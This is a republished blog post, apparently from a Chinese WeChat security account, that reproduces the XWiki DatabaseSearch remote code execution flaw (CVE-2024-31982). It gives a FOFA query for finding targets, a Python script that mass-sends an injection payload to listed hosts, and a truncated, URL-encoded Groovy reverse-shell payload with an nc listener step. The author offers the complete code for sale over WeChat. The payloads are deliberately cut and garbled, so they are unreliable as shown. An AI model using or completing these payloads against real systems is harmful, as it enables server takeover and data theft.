Ⅰ、Vulnerability Description
XWiki is an open-source wiki and application platform written in Java and released under the LGPL. Its development-platform features allow building collaborative web applications, and it also ships packaged applications built on top of the platform (a "second-generation wiki").
XWiki's DatabaseSearch page (Main/DatabaseSearch) has an RCE vulnerability (CVE-2024-31982): the search string submitted in the text parameter is rendered as wiki syntax without escaping, so any user who can reach the search page can close the block the text is placed in with }}} and inject {{async}}/{{groovy}} macros that run on the server. An attacker can execute arbitrary commands, read sensitive server data and ultimately take over the host. The issue is fixed in XWiki 14.10.20, 15.5.4 and 15.10-rc-1; instances older than those should be treated as exposed.
Ⅱ、FOFA Query
body="data-xwiki-reference"
Ⅲ、Vulnerability Reproduction
1. Send the request that executes the command (the same DatabaseSearch GET used by the POC below; with outputSyntax=plain the macro output comes back in the plain-text response body).
If the command output is echoed back in the response, the reproduction succeeded.
Ⅳ、Python POC
PS: For the full code, contact my master Chen Shifu on WeChat: Changethe_one
It will only be shared with his consent.
# Batch checker for the XWiki DatabaseSearch injection (CVE-2024-31982).
# Reads one target per line from a file and sends the probe request to each.
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36',
    'Accept-Encoding': 'gzip, deflate',
    'Accept': '*/*',
    'Connection': 'keep-alive'
}
# Requests are routed through a local Burp listener; set proxies = None to send directly.
proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080'
}
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def poc(url):
    if not url.startswith('http'):
        url = 'http://' + url
    if not url.endswith('/'):
        url += '/'
    # The text parameter is rendered as wiki syntax: "}}}" closes the block the
    # search text sits in and "{{async}}" is then parsed as a real macro.
    # The payload below is deliberately truncated in the original article.
    payload = url + 'xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20as7B%2Fasync%7D%7D%20'
    try:
        response = requests.get(payload, headers=headers, proxies=proxies, verify=False, timeout=5)
        print(url)
        # A 200 alone is a weak signal: any reachable search page returns 200.
        # Confirm by looking for the injected macro's output in response.text.
        if response.status_code == 200:
            print(url, '[+] XWiki CVE-2024-31982 present')
    except requests.exceptions.Timeout:
        print(url, 'connection timed out')
    except Exception as e:
        # TLS failures surface as HTTPSConnectionPool errors (e.g. Burp's CA not trusted).
        if 'HTTPSConnectionPool' in str(e) or 'Burp Suite Professional' in str(e):
            print(url, 'certificate error')
        else:
            print(url, str(e))

if __name__ == '__main__':
    with open(input('urls:').strip(), 'r', encoding='utf-8') as f1:
        for url in f1:
            if url.strip():
                poc(url.strip())
Many articles would just stop here, wouldn't they?
But Brother Long won't fob off my godfathers like that.
We go straight to a reverse shell.
Ⅴ、Reverse Shell
1. Start a listener on a host you control;
Start nc
2. Send the reverse shell command;
PS: The code is encrypted; contact Chen Shifu on WeChat: Changethe_one
It will only be shared with his consent.
7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dimport%20java..*%3B%0A%0AStrint%20port%20%3D%207777%3B%0A%0Atry%20%7B%0ort%29%3B%0A%20%20InputStream%20in.getInputStream%28%29%3B%0A%20%20OutputStream%20outputStream%20%3D%20socket.getOutputStream%28%29%3B%0A%20%20PrintWriter%20writer%20%3D%20new%20PrintWriter%28outputStream%2C%20true%29%3B%0A%20%20BufferedReader%20reader%20%3D%20new%20BufferedReader%28new%20InputStreamReader%28inpu
One of a kind, right? Contact me if you need it.
Originally published on the WeChat public account (暗影网安实验室): xwiki-CVE-2024-31982 vulnerability in-depth reproduction